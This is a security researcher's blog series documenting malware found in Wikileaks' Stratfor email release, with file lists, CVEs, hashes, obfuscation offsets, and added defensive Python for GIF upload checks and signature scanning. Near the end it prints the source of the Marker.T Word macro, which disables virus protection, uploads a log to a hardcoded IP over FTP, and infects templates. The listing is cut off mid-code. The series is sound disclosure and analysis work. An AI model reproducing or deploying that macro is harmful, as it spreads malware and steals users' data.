Saturday, April 15, 2017
The script includes a standard six-byte GIF header before the "<?php" establishing the opening of the PHP code, and the payload itself had a .gif file extension. It is pretty obvious, either to the naked eye or to a program performing more than a very basic check, that this .GIF is not an image. It is slightly more sophisticated than other attempts I have seen which simply rename a payload file, but not as sophisticated as payloads that are embedded within an actual image.
Developers could make attacks like these much more difficult by including more sophisticated file type checks with upload functionality. In the case of this GIF, performing a sanity check of the Logical Screen Descriptor block (it must begin with two pairs of two bytes, each a positive 16-bit integer) in addition to the Header Block would have caught this as phony. Even more obviously, checking for common open tags for scripts would have caught this and similar garbage-ware (e.g. <?, <?php, etc.).
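As an added example (my code, not the blog's), here is the layered upload check described above in Python: the six-byte header, the Logical Screen Descriptor, a walk of the block structure to the trailer, and a scan for script open tags. For a payload whose PHP starts right after the header, the two LSD dimension fields happen to decode to positive integers, so the example goes beyond the LSD check by also requiring valid blocks and no bytes after the trailer; all sample inputs are constructed inline.

```python
import struct

# Added example, not the blog's code: layered checks for an uploaded ".gif".
# 1) six-byte header, 2) Logical Screen Descriptor (LSD) sanity, 3) walk the
# block structure to the trailer, 4) refuse script open tags anywhere in the file.

GIF_HEADERS = (b"GIF87a", b"GIF89a")
SCRIPT_TAGS = (b"<?php", b"<?", b"<script", b"<%")


def parse_lsd(data):
    """Parse the 7-byte LSD that follows the header.

    Returns (width, height, global_color_table_bytes), or None when the
    descriptor is missing or either 16-bit dimension is zero.
    """
    if len(data) < 13:
        return None
    width, height, packed, _bg_index, _aspect = struct.unpack("<HHBBB", data[6:13])
    if width == 0 or height == 0:
        return None
    gct_bytes = 0
    if packed & 0x80:  # Global Color Table flag: 2^(N+1) RGB entries follow
        gct_bytes = 3 * (1 << ((packed & 0x07) + 1))
    return width, height, gct_bytes


def skip_sub_blocks(data, offset):
    """Skip size-prefixed data sub-blocks; return the offset after the 0x00 terminator."""
    while offset < len(data):
        size = data[offset]
        offset += 1
        if size == 0:
            return offset
        offset += size
    return None  # ran off the end before a terminator


def walk_blocks(data, offset):
    """Walk extension (0x21) and image (0x2C) blocks; return the trailer offset or None."""
    while offset is not None and offset < len(data):
        introducer = data[offset]
        if introducer == 0x3B:  # Trailer
            return offset
        if introducer == 0x21:  # Extension: introducer, label, then sub-blocks
            offset = skip_sub_blocks(data, offset + 2)
        elif introducer == 0x2C:  # Image Descriptor: 10 fixed bytes
            if offset + 10 > len(data):
                return None
            packed = data[offset + 9]
            offset += 10
            if packed & 0x80:  # Local Color Table present
                offset += 3 * (1 << ((packed & 0x07) + 1))
            offset = skip_sub_blocks(data, offset + 1)  # +1 skips LZW minimum code size
        else:
            return None  # not a block introducer: structure is broken
    return None


def validate_gif_upload(data):
    """Return (accepted, reason) for candidate GIF bytes."""
    if data[:6] not in GIF_HEADERS:
        return False, "missing GIF87a/GIF89a header"
    lsd = parse_lsd(data)
    if lsd is None:
        return False, "bad logical screen descriptor"
    trailer = walk_blocks(data, 13 + lsd[2])
    if trailer is None:
        return False, "block structure does not reach a trailer"
    if trailer != len(data) - 1:
        return False, "bytes appended after the GIF trailer"
    lowered = data.lower()
    if any(tag in lowered for tag in SCRIPT_TAGS):
        return False, "script open tag present in file bytes"
    return True, "ok"


# Constructed samples (not files from the blog).
VALID_GIF = (
    b"GIF89a" + b"\x01\x00\x01\x00" + b"\x00\x00\x00"       # header; LSD: 1x1, no GCT
    + b"\x2c" + b"\x00\x00\x00\x00\x01\x00\x01\x00\x00"      # image descriptor, no LCT
    + b"\x02" + b"\x02\x44\x01" + b"\x00"                    # LZW code size, one sub-block, terminator
    + b"\x3b"                                                # trailer
)
PHP_TEXT = b"<?php echo 'hello'; ?>"
HEADER_ONLY_PAYLOAD = b"GIF89a" + PHP_TEXT                   # the pattern described above
APPENDED_PAYLOAD = VALID_GIF + PHP_TEXT                      # real image, script after trailer
COMMENT_PAYLOAD = (                                          # script inside a comment extension
    VALID_GIF[:-1] + b"\x21\xfe" + bytes([len(PHP_TEXT)]) + PHP_TEXT + b"\x00" + b"\x3b"
)

if __name__ == "__main__":
    for name, sample in [("valid", VALID_GIF), ("header-only", HEADER_ONLY_PAYLOAD),
                         ("appended", APPENDED_PAYLOAD), ("comment", COMMENT_PAYLOAD)]:
        print(name, parse_lsd(sample), validate_gif_upload(sample))
```

The tag scan is a byte-level heuristic; compressed image data can contain any byte sequence, so treat a hit as grounds to reject or re-encode the upload rather than as proof of intent.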
Sunday, July 31, 2016
I plan on writing a post on how assumptions about user behavior are frequently inaccurate, and in particular on how assumptions about Wikileaks researchers analyzing email dumps are especially prone to failure when they are based on the typical behavior of normal email users, but for now I'll just leave this here:
Has anybody's InfoSec experts advised abt wisdom of opening WikiLeaks sound files? Are we all just downloading Russian malware like morons?— David Fahrenthold (@Fahrenthold) July 28, 2016
Friday, July 29, 2016
If anyone is interested I might post my complete conversation with Rogers, where I talk in more detail about how the unlabeled distribution of email attachments from compromised email servers poses unique dangers to journalists, activists and researchers whose job involves reviewing each of those attachments.
This article represents the most attention paid by US media to the significant dangers posed to Wikileaks users by the insecure review methodology in place prior to distribution of these files. Although major newspapers in Europe and the UK published my findings on malware within the GI Files, no major news outlets in the United States published those findings.
Tuesday, September 15, 2015
As I discussed in my series of posts explaining how the Stratfor email dump hosted by Wikileaks contains malicious software, I first came across a series of infected files when I downloaded and reviewed a torrent file hosted on the Wikileaks subsite "wlstorage.net". A number of factors at the time led me to believe that "wlstorage.net" was not a mirror of Wikileaks hosted by a third party, but was in fact run by the Wikileaks organization directly: notably, that both wlstorage.net and wikileaks.org resolved to the same set of IP addresses, both sites shared the same SSL certificate, and wlstorage.net was linked to throughout wikileaks.org.
Today it was brought to my attention that wlstorage.net has been taken offline, and I verified that the DNS entry for wlstorage.net has been kiboshed. wlstorage.net uses the Wikileaks nameservers (ns1.wikileaks.org & ns2.wikileaks.org), so this change would have been performed by a trusted member of the Wikileaks technical team. I am not aware of any announcements from Wikileaks stating the reason for the removal of wlstorage.net from DNS. Whatever the reason for the change, this update has not removed the infected files from distribution.
As of this writing (9/15/2015), all of the infected files remain available for direct, individual download through a series of dozens of curated links directly from the wikileaks.org website. I have also received reports that those attempting to download the infected torrent file using a Bittorrent client are unable to find a complete peer to seed the torrent. If anyone wishes to review these files for research purposes you are welcome to contact me and I can seed temporarily. For obvious reasons I am not interested in seeding the torrent on anything like an ongoing basis, and I encourage researchers and journalists to review the infected files directly on wikileaks.org as a first step. I have compiled a list of URLs containing infected files and posted it to PasteBin; I also have a post explaining that infected files are not restricted to the torrent file.
Tuesday, August 4, 2015
- Yahoo's ad network and Microsoft Azure's web hosting service were abused to circulate an enormous flood of malicious software. Malwarebytes is being credited with the discovery, which is a little amusing because Malwarebytes has had its own issues with security for many years. h/t Washington Post
- Planned Parenthood and a variety of other related organizations were brought offline by a sustained series of DDoS attacks. In what may or may not have been the work of the same group of individuals, someone has claimed they have hacked Planned Parenthood and retrieved an employee list database of some kind or another.
AFAIK, this sort of thing is new to the abortion debate in the US - honestly the only political debates where this sort of thing typically comes to the fore are "internet" issues surrounding surveillance, cryptocurrency and the like. The "Culture Wars" are fought in city halls, lobbyist offices and in the bank transfers of PACs rather than through data center Meet Me rooms.
Personally I am interested in finding out if the DDoS was outsourced or if there is, in fact, a pro-life botnet. Will online hooliganism become a part of the political conversation? h/t Rolling Stone
- The Electronic Frontier Foundation and Muck Rock have partnered to file a butt-load of FOIA requests in order to provide the public with a better understanding of how biometrics is being used by law enforcement and federal government agencies to provide street level, warrantless surveillance of ordinary Americans. h/t Muck Rock
- In a strange move, DHS Deputy Secretary Alejandro Mayorkas said that some provisions of the Cybersecurity Information Sharing Act (CISA) “could sweep away important privacy protections” and that proposed legislation “raises privacy and civil liberties concerns.” Apparently Mayorkas found nothing ironic about this statement, while the news outlets who retyped the message for public consumption found it completely normal. h/t Russia Today
Friday, July 31, 2015
Cryptome is a long-time advocate of government transparency, and had already been publishing leaked documents on its website for close to a decade when Wikileaks was first created. Here is how Cryptome describes its mission:
Cryptome welcomes documents for publication that are prohibited by governments worldwide, in particular material on freedom of expression, privacy, cryptology, dual-use technologies, national security, intelligence, and secret governance -- open, secret and classified documents -- but not limited to those. Documents are removed from this site only by order served directly by a US court having jurisdiction. No court order has ever been served; any order served will be published here -- or elsewhere if gagged by order. Bluffs will be published if comical but otherwise ignored.
Cryptome has had its ups and downs over the years. Certainly, publication there is not verification of my findings. However, I greatly appreciate the publication and hope that it contributes to my ongoing goals of getting some extra pairs of eyes reviewing these malicious files as well as other file leaks, and of warning journalists and activists of the dangers of improperly handling these malware-infected files.
At least two major newspapers that I know of will be running features; I'll post those as they are released.
Wednesday, July 15, 2015
Malware discovered in the Stratfor email file dump provided by Wikileaks is not limited to torrents - curated content on the Wikileaks website also infected
Since that time I have made numerous attempts to contact Wikileaks so that they could inform their users that the torrent contained malicious software. After receiving no response, I began to publicize my findings by posting them on Hacker News/Ycombinator and similar sites like Slashdot and Reddit. My post on Hacker News quickly reached the front page and attracted the attention of the former leader of Lulzsec, Hector Monsegur (aka sabu), who confirmed the validity and importance of my findings in a series of public tweets.
In my original post, I speculated that:
"The data is indeed massive, over 5.5 million emails. Perhaps so massive that ~ two years was not long enough to properly review and sanitize these files prior to their complete publication in 2014 (from the time they were received by WL sometime around 2012)."
The publication of the Global Intelligence Files by Wikileaks began on February 27th, 2012. The entire email server spool was not dumped onto the internet at one time. The publication was curated, with only a small percentage of the emails being published initially. Over time, more emails were published. This progression can be easily viewed on the directory hosting the torrents for the Stratfor leaks:
The torrent file that contains malware is the only file in the directory with a nomenclature that does not include a full date (it was also created using bzip instead of 7zip); the filename is simply gifiles-2014.tar.bz2.torrent. Initially, this meant I was not sure of the exact date that the torrent was released.
I knew that a relatively small amount of curated content was available on the Wikileaks.org website. Today I was able to confirm that malicious files and their related attachments are also being hosted on Wikileaks.org as individual uncompressed files. I have compiled a list of these files, their URLs and basic file information on pastebin (I have embedded the pastebin below as an iframe; if you don't trust iframes in your browser you can click through the prior link instead):
NOTE: Wikileaks has multiple URLs servicing multiple directory structures, all that eventually seem to point to the same place. So for example, https://wikileaks.org/gifiles/docs/35/3547802_plans-coordinates-and-executes-.html and https://search.wikileaks.org/gifiles/emailid/3547802 both point to the same content (and include the same malware attachment available for download).
While I am not alone in my concern over the circulation of an infected torrent of the nature I described in my first post, posting individual infected files directly to the *.wikileaks.org domain and several subdomains in a curated manner is likely more dangerous: users are more likely to consider a link like the following to be content that has in some fashion been secured:
An expectation that a video posted on Fox News will not contain an embedded script is not a wild expectation. Similarly a New York Times article that includes a photo in an article is usually believed to not contain spyware. This is a basic expectation of service on every website, not just news outlets. Primary sources are important. User transparency is also important.
The attached file above, "18714_Research_and_R.xls", appears to be a normal Excel spreadsheet but in fact contains an embedded OLE. It is the exact size in bytes as the same attachment I discovered within the torrent that started this series of posts:
Of course there is no need to take my word for it. The file contains an embedded OLE and PE file, the hallmarks of malware designed to exploit vulnerabilities in the Microsoft Office Suite. Of note are the following:
An API-Hashing signature is stored at 0x3ad1
There are two decryption loops at 0x00003932 and 0x00003934
The embedded OLE signature is stored at 0x7a00
An XOR encrypted MZ/PE signature is stored at 0x5a00 and the encryption key is 0x97
A ROL encrypted OLE signature is stored at 0x7a00 and the encryption key is 0x08
OfficeMalScanner can duplicate these results. When I ran OfficeMalScanner against "18714_Research_and_R.xls" using the brute debug scan mode, the scan produced a malicious index of 62. Several antiviruses will detect this file. Depending on which you use, it might declare the file to use CVE-2009-3129 or CVE-2009-0557 (it probably relies on both exploits at different points). I have created bin files from memory dumps of the embedded OLE and PE (as I have for the roughly dozen similar malware payloads); I am happy to provide those to interested researchers. Here are the relevant signatures:
MD5 2746a014bdd9f7bf252262b82cf63e11
SHA1 cf525700b9e1027c4628fa9689bf68777291c60d
SHA256 4f9550c3f3abbfac4153b4467666e7a46e29ab974627ffd7feed7a711d55ffcd
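As an added example (my code, not OfficeMalScanner's and not the blog's), here is the kind of brute-force scan that produces findings like the offsets and keys listed above: it searches a document for MZ/PE and OLE signatures under every single-byte XOR key and every ROL shift, and confirms an MZ hit by checking that its e_lfanew pointer leads to a PE signature under the same decoding. The document it scans is constructed inline, with a PE image XOR-encoded under key 0x97 and an OLE signature rotated by 3 bits at made-up offsets.

```python
import struct
from functools import partial

# Added example, not OfficeMalScanner's or the blog's code: brute-force search for
# XOR- and ROL-obfuscated MZ/PE and OLE signatures inside a document.
OLE_MAGIC = bytes.fromhex("d0cf11e0a1b11ae1")  # compound file (OLE2) header
PE_MAGIC = b"PE\x00\x00"
MZ_MAGIC = b"MZ"


def rol8(value, shift):
    """Rotate an 8-bit value left by shift bits."""
    shift &= 7
    return ((value << shift) | (value >> (8 - shift))) & 0xFF


def xor_bytes(buf, key):
    return bytes(b ^ key for b in buf)


def rol_bytes(buf, shift):
    return bytes(rol8(b, shift) for b in buf)


def find_all(data, needle):
    """Yield every offset at which needle occurs in data."""
    pos = data.find(needle)
    while pos != -1:
        yield pos
        pos = data.find(needle, pos + 1)


def has_pe_header(data, mz_offset, decode):
    """Confirm an MZ hit: e_lfanew (at +0x3C) must point at a PE signature under the same decoding.

    This is what separates a real embedded executable from a random two-byte match.
    """
    if mz_offset + 0x40 > len(data):
        return False
    e_lfanew = struct.unpack("<I", decode(data[mz_offset + 0x3C:mz_offset + 0x40]))[0]
    pe_offset = mz_offset + e_lfanew
    if e_lfanew > 0x1000 or pe_offset + 4 > len(data):  # keep the pointer plausible
        return False
    return decode(data[pe_offset:pe_offset + 4]) == PE_MAGIC


def scan_obfuscated_signatures(data):
    """Return sorted (signature, method, key, offset) tuples; XOR key 0 is reported as plain."""
    hits = set()
    for key in range(256):
        decode = partial(xor_bytes, key=key)
        method = "plain" if key == 0 else "xor"
        for off in find_all(data, xor_bytes(OLE_MAGIC, key)):
            hits.add(("OLE", method, key, off))
        for off in find_all(data, xor_bytes(MZ_MAGIC, key)):
            if has_pe_header(data, off, decode):
                hits.add(("MZ/PE", method, key, off))
    for shift in range(1, 8):
        decode = partial(rol_bytes, shift=8 - shift)  # rotating left by 8-s undoes a ROL by s
        for off in find_all(data, rol_bytes(OLE_MAGIC, shift)):
            hits.add(("OLE", "rol", shift, off))
        for off in find_all(data, rol_bytes(MZ_MAGIC, shift)):
            if has_pe_header(data, off, decode):
                hits.add(("MZ/PE", "rol", shift, off))
    return sorted(hits)


def build_sample():
    """Constructed document (not a real attachment): a plain OLE header at 0, a PE image
    XOR-encoded with key 0x97 at 0x200, and an OLE signature ROL 3 at 0x600."""
    pe_image = bytearray(0x100)
    pe_image[0:2] = MZ_MAGIC
    pe_image[0x3C:0x40] = struct.pack("<I", 0x80)  # e_lfanew -> PE header at +0x80
    pe_image[0x80:0x84] = PE_MAGIC
    doc = bytearray(0x800)
    doc[0:8] = OLE_MAGIC
    doc[0x200:0x300] = xor_bytes(bytes(pe_image), 0x97)
    doc[0x600:0x608] = rol_bytes(OLE_MAGIC, 3)
    return bytes(doc)


if __name__ == "__main__":
    for sig, method, key, off in scan_obfuscated_signatures(build_sample()):
        print(f"{sig:5s} {method:5s} key={key:#04x} offset={off:#06x}")
```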
As I mentioned earlier in this post, Google's malware service in Chrome detects only three of the 18 infected attachments found so far. Those that are detected are the oldest malware by date sent and are all compressed executables (one a .COM and the other two .EXEs) rather than payloads embedded within documents. Here is what downloading one of these off of the Wikileaks website looks like as of now:
Both of the old nasty .EXEs appear to have been sent from firstname.lastname@example.org, which as far as I can tell was/is the email address of Meredith Friedman, the VP of Communications for Stratfor:
Email-ID 3451016
Date 2003-11-04 15:32:57
From email@example.com
To firstname.lastname@example.org, email@example.com
Subject: FW: Re: our private photos bkarngkr

Email-ID 3491917
Date 2004-01-27 01:03:10
From firstname.lastname@example.org
To email@example.com
Subject: FW: HI
Would anyone care to bet me a dollar that in late 2003 her email password was "mfriedman", her birthday, "12345" or some combination thereof?
The source of the .COM file is as follows:
Email-ID 3547802
Date 2001-11-10 05:16:54
From firstname.lastname@example.org
To undisclosed-recipients:
Subject: Plans, coordinates, and executes
Finally for today, please do not make the mistake of assuming that all of the exploits are from this time period and thus are of no importance to modern computer users. I cannot make this clear enough: these two files are the *oldest* of the malicious files I have discovered.
To return to the first post in our series on the Wikileaks / Stratfor email malware click here.
If you are looking for the second post, where we look briefly inside one of the executables click here.
This is the link for my conversation with Hector Monsegur AKA sabu of Lulzsec on the Wikileaks / Stratfor email malware.
Monday, July 13, 2015
Hector Monsegur (formerly sabu of Lulzsec) has responded to my analysis of the Wikileaks Global Intelligence Files
The torrent file was one of the latest versions of what Wikileaks has named the "Global Intelligence Files" - a large cache of documents obtained from the email spool of a government contractor known as Stratfor.
Since my discovery I have made several attempts to contact Wikileaks:
@wikileaks sorry to contact here but no other means Ive identified sec issues with most recent torrent here: https://t.co/oeBLtLgDeb— Josh Wieder (@JoshWieder) May 3, 2015
In addition to Twitter I have attempted to email just about every address I could find on their site (none of them work), as well as attempting to use the chat function mentioned on the Wikileaks Twitter feed. I have been unable to receive a response. Users must be notified when a file transfer contains malware; particularly given the sensitive nature of the documents in question.
@wikileaks I have some very basic info here http://t.co/cvjY4xWuIr and here: http://t.co/74Xbmxjmy7 can provide more as needed— Josh Wieder (@JoshWieder) May 3, 2015
This afternoon I received a series of comments on Twitter from former Lulzsec member Hector Monsegur. In his comments, Monsegur denies instigating the attack that led to the release of the Stratfor files while confirming the danger of the malware contained in the files I identified:
@JoshWieder Nice read but I didnt instigate the attack. A lot of those big dumps at the time (Italian Cybercrime hack) had malware within.— Hector X. Monsegur (@hxmonsegur) July 13, 2015
@JoshWieder @wikileaks You are correct. Nosediving into these kind of dumps without an understanding of risk will lead to compromise.— Hector X. Monsegur (@hxmonsegur) July 13, 2015
@JoshWieder An attackers assumption would be that media and LEAs will click around files looking for info. What better way to get new vics— Hector X. Monsegur (@hxmonsegur) July 13, 2015
|Hector Monsegur during an interview with CBS|
@hxmonsegur Thanks for reply. I tend to agree w/ your assessment. It looks like these guys ran a mailserver w/out clamav or similar— Josh Wieder (@JoshWieder) July 13, 2015
@hxmonsegur So all of the typical spammer garbage got delivered & stored. At this point my main frustration is that the files are being— Josh Wieder (@JoshWieder) July 13, 2015
As of this writing (3PM @ 7-13-2015) Wikileaks continues to provide a torrent file with an identical timestamp, filename and byte size as the one I analyzed without any warning message notifying users of the danger of handling the files.
@hxmonsegur circulated by @wikileaks w/out warning users of malware within despite multiple attempts to contact them— Josh Wieder (@JoshWieder) July 13, 2015
To return to the first post in our series on the Wikileaks / Stratfor email malware click here.
If you are looking for the second post, where we look briefly inside one of the executables click here.
And here is a link to the next post in my Wikileaks / Stratfor email malware series, where I demonstrate how the malware is available file by file on the Wikileaks.Org website, and not just within the torrent as I originally suspected.
Tuesday, March 31, 2015
I am slowly going through the malicious files in order to better understand what they are attempting to do. The work primarily involves extracting Visual Basic macros and OLE structures from documents, then disassembling the executables scraped from the payload documents. Even for files using well-documented exploits, as many of these files are, this is slow-going and tedious work, and I invite readers experienced in security research to contact me and offer assistance.
One such executable retrieved from the Stratfor files is gifiles-2014\gifiles\attach\151\151784_Command.com. As with the files reviewed yesterday, this was retrieved from the gifiles-2014.tar.gz.torrent file downloaded from wlstorage.net, which resides on the same servers as wikileaks.org. I have disassembled this executable using Heaven Tools' PE Explorer and Hex-Rays IDA. Accordingly I have determined that the file contains a variant of the Magistr worm. However, this version seems to have a number of unique features that I have not seen in the literature concerning Magistr (NOTE there are numerous versions of this worm, and this one has likely been seen before by someone).
The program makes use of the following DLLs to call its various functions:
KERNEL32.dll
USER32.dll
COMCTL32.dll
WININET.dll
cmpbk32.dll
cmutil.dll
The program adds an entry for itself in the Microsoft Connection Manager Phone Books and uses that entry to establish both FTP and HTTP connections. I am still working on where the connections head to.
|The program loads the MSCM Phone Book|
|Connection Manager is used to establish an FTP connection and transfer files|
|HTTP connections are established as well|
PBUPDATE.PBD
PBUPDATE.EXE
PBUPDATE.INF
PBUPDATE.VER
|PBUPDATE.EXE is associated with iPassConnect|
I am more than happy to share more comprehensive information concerning my research, so feel free to email me if you would like to help out.
I have also contacted Wikileaks (to the best of my ability) to warn them of the dangerous files being distributed on wlstorage.net. For a number of reasons they are not the easiest people to get ahold of, particularly in relation to technical issues, and I do not know anyone directly affiliated with the group. If someone reading this post does have a more direct means of communication with Wikileaks, please provide them with this information ASAP!
Monday, March 30, 2015
Hector Monsegur, formerly sabu of Lulzsec, has offered his point of view on this post. Get his opinion by reading my third post on the topic.
In my fourth post on this topic, I explain how malware is not limited to the Stratfor leak torrent - curated links throughout the Wikileaks.Org website allow users to download individual infected files.
This series of posts is beginning to receive coverage from several newspapers around the world. German speakers should check out the story in Neue Zürcher Zeitung / New Zurich Times. For English speakers, I recommend The Register from the UK for an excellent summary of these findings.
Beginning on February 27, 2012, the controversial news organization Wikileaks has been publishing a large and growing trove of emails from the private intelligence firm Strategic Forecasting, Inc (more widely known as Stratfor). The leak publication began with 200 emails, with Wikileaks progressively publishing more and more emails through the final publication date of July 18, 2014, at which time a single file containing over 5 million emails was published.
The source of the content was Jeremy Hammond, working in concert with Hector Xavier Monsegur as part of the group AntiSec. Hammond is currently in prison for the hack. Monsegur remains free; he was an FBI informant at the time of the hack and the release of the files. While the hack is attributed to Hammond, reliable sources are indicating that it was Monsegur who instigated the attack while he worked for the FBI. (NOTE: Hector X. Monsegur has personally responded to this blog post and has denied this characterization of what happened. My only information on the history of the documents was obtained through media sources and court documents, which are often not reliable. I have not attempted to contact Jeremy Hammond. I only included this very brief foreword in an attempt to explain the history of the documents, which is still contested.)
It has been widely reported that Monsegur used an FBI-provided laptop and often worked full-time from an FBI office in New York during the nine-month period in which #antisec and #lulzsec released their widely distributed hacks, including the Stratfor job. To confuse matters further, court documents include reference to a third party, someone named Hyrriiya, who provided information critical to the Stratfor intrusion.
The content of the emails, though of obvious political and social significance, is not relevant to our post here. Newspapers around the world have spent a significant amount of time reporting on those leaks. However, no one appears to have noticed that a significant number of the files included in the leak contain malicious code that is designed to, among other things, retrieve detailed information about the computers which have downloaded them and send it to a variety of remote systems.
My research is still in progress; however, the wide circulation of this data and the apparent lack of any notification of the danger in these files have convinced me to publish what little I have found immediately.
I ought to be clear from the outset: I have no information linking Wikileaks, Assange, Hammond, Monsegur, the FBI or anyone else directly with these malicious files. That very well may change quickly as research progresses, but at no point should this post be considered finger pointing. The purpose of this post is not to assign responsibility but to ensure that the journalists and activists downloading these files or who have already downloaded these files understand the consequences and take proper precautions. If I can encourage security researchers to take a look at these files it would be a bonus.
The files in question are not being distributed directly through the wikileaks.org domain, but through a secondary domain, wlstorage.net. While the domains are separate, wlstorage.net is linked directly from the Wikileaks Global Intelligence Files web page (at https://wikileaks.org/gifiles), and the two share the same SSL certificate as well as the same IP addresses. This would seem to (but doesn't entirely) rule out the notion that traffic is being diverted from Wikileaks to a fake server to fool users into downloading the malicious files.
# host wikileaks.org
wikileaks.org has address 184.108.40.206
wikileaks.org has address 220.127.116.11
wikileaks.org has address 18.104.22.168
wikileaks.org has address 22.214.171.124
wikileaks.org has address 126.96.36.199
wikileaks.org has address 188.8.131.52
wikileaks.org mail is handled by 1 mx.wikileaks.org.
# host wlstorage.net
wlstorage.net has address 184.108.40.206
wlstorage.net has address 220.127.116.11
wlstorage.net has address 18.104.22.168
wlstorage.net has address 22.214.171.124
wlstorage.net has address 126.96.36.199
wlstorage.net has address 188.8.131.52
|The Wikileaks.Org Global Intelligence Files web page|
|The link to wlstorage.net from Wikileaks|
|The Global Intelligence Files torrent files on wlstorage.net|
issuer= /C=FR/O=GANDI SAS/CN=Gandi Standard SSL CA
subject= /OU=Domain Control Validated/OU=Gandi Standard Wildcard SSL/CN=*.wikileaks.org
notBefore=Oct 14 00:00:00 2013 GMT
notAfter=Oct 14 23:59:59 2015 GMT
00b5f826
SHA1 Fingerprint=10:B3:D9:66:7F:BC:57:B5:C1:CF:98:5B:16:E3:EC:61:A4:C3:ED:32
# echo |\
> openssl s_client -connect wikileaks.org:443 2>&1 |\
> sed -ne '/-BEGIN CERTIFICATE-/,/-END CERTIFICATE-/p'
(PEM certificate body omitted)
# echo |\
> openssl s_client -connect wlstorage.net:443 2>&1 |\
> sed -ne '/-BEGIN CERTIFICATE-/,/-END CERTIFICATE-/p'
(PEM certificate body omitted)
I have reviewed the last two file dumps listed in the wlstorage.net torrent list: gifiles-20121104151320.7z & gifiles-2014.tar.bz2. I was unable to identify any malware in gifiles-20121104151320.7z, which is notable for a number of reasons. Each of these files is massive: gifiles-20121104151320.7z is close to 3GB while compressed. However, gifiles-2014.tar.bz2 is 9x the size of gifiles-20121104151320.7z. The two files also use a different compression scheme. 7zip is a Windows compression program, and 7zip was used to make every gifiles torrent dump except for gifiles-2014.tar.bz2, which uses Tar and BZip, commonly used on Windows & Linux. It's reasonable to assume that gifiles-2014.tar.bz2 was created on a different computer than all of the other distributions.
I've identified the following exploits being used:
MARKER.T
CVE-2006-2492
CVE-2009-0557
CVE-2011-0611
CVE-2010-3333
HEAPSPRAY
Mydoom
Magistr
Pdfjsc.BP
Wordjmp.gen
Mimail
The software vulnerable to these exploits is (version omitted while research is in progress):
Adobe Acrobat
Adobe Flash Player ActiveX
Microsoft Office
Microsoft Office for Mac
Open XML File Format Converter
These exploits are contained in the following files:
gifiles-2014\gifiles\attach\6\6566_The Split Betw.doc
gifiles-2014\gifiles\attach\19\19701_MASY - Q MASY HUMINT.doc
gifiles-2014\gifiles\attach\19\19719_List of Addresses - Advance Copies.doc
gifiles-2014\gifiles\attach\152\152977_Happy vacation.pdf
gifiles-2014\gifiles\attach\18\18714_Research_and_R.xls
gifiles-2014\gifiles\attach\117\117687_Lithium.doc
gifiles-2014\gifiles\attach\117\117870_Hybrid write-up2.doc
gifiles-2014\gifiles\attach\117\117793_Hybrid write-up.doc
gifiles-2014\gifiles\attach\47\47247_US Congress re.doc
gifiles-2014\gifiles\attach\47\47329_US Congress re.doc
gifiles-2014\gifiles\attach\52\52004_IRAN_STRAIT_PART.pdf
gifiles-2014\gifiles\attach\151\151784_Command.com
gifiles-2014\gifiles\attach\151\151098_text.zip->(Zip)
gifiles-2014\gifiles\attach\151\151098_text.zip->text.exe
gifiles-2014\gifiles\attach\119\119443_Russia Data Requests.doc
gifiles-2014\gifiles\attach\142\142345_photos.zip->(Zip)
gifiles-2014\gifiles\attach\142\142345_photos.zip->photos.jpg.exe
gifiles-2014\gifiles\attach\146\146924_message.zip->(Zip)
gifiles-2014\gifiles\attach\146\146924_message.zip->message.exe
gifiles-2014\gifiles\attach\17\17102_Draft scenarios for Libya_0416.pdf
These attachments are just phishing nonsense and don't contain malicious software, but if you scan this dump with an antivirus they may trigger a positive:
I have been working on extracting the payloads from the .DOC files first before moving on to the .PDFs and attempting to decompile the few executables. I have been able to confirm that the exploits and payloads in 117687_Lithium.doc, 117870_Hybrid write-up2.doc and 117793_Hybrid write-up.doc are identical. Here are the relevant signatures for the files:
Each of these three documents contains the following Visual Basic macro, a classic Marker.T that is well over 10 years old:
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
    On Error Resume Next
    Const Marker = "<- this is a marker!"
    'Declare Variables
    Dim SaveDocument, SaveNormalTemplate, DocumentInfected, NormalTemplateInfected As Boolean
    Dim ad, nt As Object
    Dim OurCode, UserAddress, LogData, LogFile As String
    'Initialize Variables
    Set ad = ActiveDocument.VBProject.VBComponents.Item(1)
    Set nt = NormalTemplate.VBProject.VBComponents.Item(1)
    DocumentInfected = ad.CodeModule.Find(Marker, 1, 1, 10000, 10000)
    NormalTemplateInfected = nt.CodeModule.Find(Marker, 1, 1, 10000, 10000)
    'Switch the VirusProtection OFF
    Options.VirusProtection = False
    If (Day(Now()) = 1) And (System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info", "LogFile") = False) Then
        If DocumentInfected = True Then
            LogData = ad.CodeModule.Lines(1, ad.CodeModule.CountOfLines)
        ElseIf NormalTemplateInfected = True Then
            LogData = nt.CodeModule.Lines(1, nt.CodeModule.CountOfLines)
        End If
        LogData = Mid(LogData, InStr(1, LogData, "' Log" & "file -->"), Len(LogData) - InStr(1, LogData, "' Log" & "file -->"))
        For i = 1 To 4
            LogFile = LogFile + Mid(Str(Int(8 * Rnd)), 2, 1)
        Next i
        LogFile = "C:\hsf" & LogFile & ".sys"
        Open LogFile For Output As #1
        Print #1, LogData
        Close #1
        Open "c:\netldx.vxd" For Output As #1
        Print #1, "o 184.108.40.206"
        Print #1, "user anonymous"
        Print #1, "pass itsme@"
        Print #1, "cd incoming"
        Print #1, "ascii"
        Print #1, "put " & LogFile
        Print #1, "quit"
        Close #1
        Shell "command.com /c ftp.exe -n -s:c:\netldx.vxd", vbHide
        System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info", "LogFile") = True
    End If
    'Make sure that some conditions are true before we continue infecting anything
    If (DocumentInfected = True Xor NormalTemplateInfected = True) And _
       (ActiveDocument.SaveFormat = wdFormatDocument Or _
        ActiveDocument.SaveFormat = wdFormatTemplate) Then
        'Infect the NormalTemplate
        If DocumentInfected = True Then
            SaveNormalTemplate = NormalTemplate.Saved
            OurCode = ad.CodeModule.Lines(1, ad.CodeModule.CountOfLines)
            'Write a log file of this NormalTemplate infection
            For i = 1 To Len(Application.UserAddress)
                If Mid(Application.UserAddress, i, 1) <> Chr(13) Then
                    If Mid(Application.UserAddress, i, 1) <> Chr(10) Then
                        UserAddress = UserAddress & Mid(Application.UserAddress, i, 1)
                    End If
                Else
                    UserAddress = UserAddress & Chr(13) & "' "
                End If
            Next i
